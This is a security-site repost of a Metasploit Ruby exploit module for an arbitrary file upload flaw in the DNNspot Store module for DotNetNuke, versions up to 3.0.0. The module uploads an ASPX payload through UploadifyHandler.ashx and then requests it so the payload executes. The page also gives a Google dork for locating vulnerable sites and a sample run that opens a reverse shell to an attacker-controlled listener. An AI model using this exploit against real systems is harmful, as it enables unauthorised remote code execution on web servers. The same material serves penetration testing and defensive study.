首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
DotNetNuke DNNspot Store 3.0.0 Arbitary File Upload
来源:metasploit.com 作者:Glafkos 发布时间:2014-10-23  
# Exploit Title: DotNetNuke DNNspot Store (UploadifyHandler.ashx) <= 3.0.0 Arbitary File Upload
# Date: 23/01/2014
# Author: Glafkos Charalambous
# Version: 3.0.0
# Vendor: DNNspot
# Vendor URL: https://www.dnnspot.com
# Google Dork: inurl:/DesktopModules/DNNspot-Store/
#
# root@kali:~# msfcli exploit/windows/http/dnnspot_upload_exec payload=windows/shell/reverse_tcp LHOST=192.168.13.37 LPORT=31337 RHOST=192.168.31.33 RPORT=80 E
# [*] Initializing modules...
# payload => windows/shell/reverse_tcp
# LHOST => 192.168.13.37
# LPORT => 31337
# RHOST => 192.168.31.33
# [-] Handler failed to bind to 192.168.13.37:31337
# [*] Started reverse handler on 0.0.0.0:31337 
# [*] 192.168.31.33:80 - Uploading payload...
# [*] 192.168.31.33:80 - Executing payload trrnegmv.aspx
# [*] Encoded stage with x86/shikata_ga_nai
# [*] Sending encoded stage (267 bytes) to 192.168.31.33
# [*] Command shell session 1 opened (192.168.13.37:31337 -> 192.168.31.33:56806) at 2014-08-28 20:56:23 +0300
# [+] Deleted trrnegmv.aspx
# 
# Microsoft Windows [Version 6.2.9200]
# (c) 2012 Microsoft Corporation. All rights reserved.
# 
# C:\Windows\SysWOW64\inetsrv>
#


require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'DotNetNuke DNNspot Store (UploadifyHandler.ashx) <= 3.0.0 Arbitary File Upload',
      'Description'    => %q{
        This module exploits an arbitrary file upload vulnerability found in DotNetNuke DNNspot Store
		module versions below 3.0.0.
      },
      'Author'         =>
        [
          'Glafkos Charalambous <glafkos.charalambous[at]unithreat.com>'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://metasploit.com' ]
        ],
      'Platform'       => 'win',
      'Arch'           => ARCH_X86,
      'Privileged'     => false,
      'Targets'        =>
        [
          [ 'DNNspot-Store / Windows', {} ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 21 2014'))
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri("DesktopModules/DNNspot-Store/Modules/Admin/UploadifyHandler.ashx")
    })

    if res and res.code == 200
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    @payload_name = "#{rand_text_alpha_lower(8)}.aspx"
    exe  = generate_payload_exe
    aspx  = Msf::Util::EXE.to_exe_aspx(exe)
    post_data = Rex::MIME::Message.new
    post_data.add_part(aspx, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    post_data.add_part("/DesktopModules/DNNspot-Store/ProductPhotos/", nil, nil, "form-data; name=\"folder\"")
    post_data.add_part("1", nil, nil, "form-data; name=\"productId\"")
    post_data.add_part("w00t", nil, nil, "form-data; name=\"type\"")
    data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload...")
    res = send_request_cgi({
      "method" => "POST",
      "uri"    => normalize_uri("DesktopModules/DNNspot-Store/Modules/Admin/UploadifyHandler.ashx"),
      "data"   => data,
      "ctype"  => "multipart/form-data; boundary=#{post_data.bound}"
    })

    unless res and res.code == 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    register_files_for_cleanup(@payload_name)

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_cgi({
	  'method' => 'GET',
      'uri'    => normalize_uri("/DesktopModules/DNNspot-Store/ProductPhotos/",@payload_name)
    })
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Incredible PBX 11 2.0.6.5.0 Re
·Feng Office 1.7.4 - Arbitrary
·HP Data Protector EXEC_INTEGUT
·Free WMA MP3 Converter 1.8 SEH
·Joomla Akeeba Kickstart Unseri
·Free WMA MP3 Converter 1.8 Buf
·Numara / BMC Track-It! FileSto
·WordPress / Joomla Creative Co
·Windows OLE Package Manager Sa
·OpenBSD 5.5 Local Kernel Panic
·ZTE ZXDSL-931VII - Unauthentic
·Centreon SQL / Command Injecti
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved